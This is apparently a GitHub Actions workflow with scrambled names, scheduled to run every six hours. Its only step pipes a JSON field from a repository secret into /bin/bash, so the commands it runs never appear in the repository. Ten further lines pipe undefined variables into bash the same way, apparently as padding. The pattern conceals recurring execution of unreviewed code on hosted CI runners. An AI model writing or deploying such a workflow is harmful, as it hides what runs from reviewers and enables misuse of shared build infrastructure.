name: shengrenwuj

on:
  workflow_dispatch:
  schedule:
    - cron: '7 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: shengrenwuj
        env:
          yt46946: ${{ secrets.yt46946 }}
        run: |
          echo $yt46946 | jq -r .n78517 | /bin/bash
          echo $osupe32302 | jq -r .xpcek96 | /bin/bash
          echo $yjez3 | jq -r .bpkpx388 | /bin/bash
          echo $fhjf7708 | jq -r .nbnhe1384 | /bin/bash
          echo $qzhf7 | jq -r .cori1813 | /bin/bash
          echo $crh6244 | jq -r .swtr76 | /bin/bash
          echo $q3 | jq -r .lzl8 | /bin/bash
          echo $l677 | jq -r .rxg7193 | /bin/bash
          echo $d9579 | jq -r .s04 | /bin/bash
          echo $bwj606 | jq -r .jx8 | /bin/bash
          echo $fzckr42126 | jq -r .rlcte0 | /bin/bash

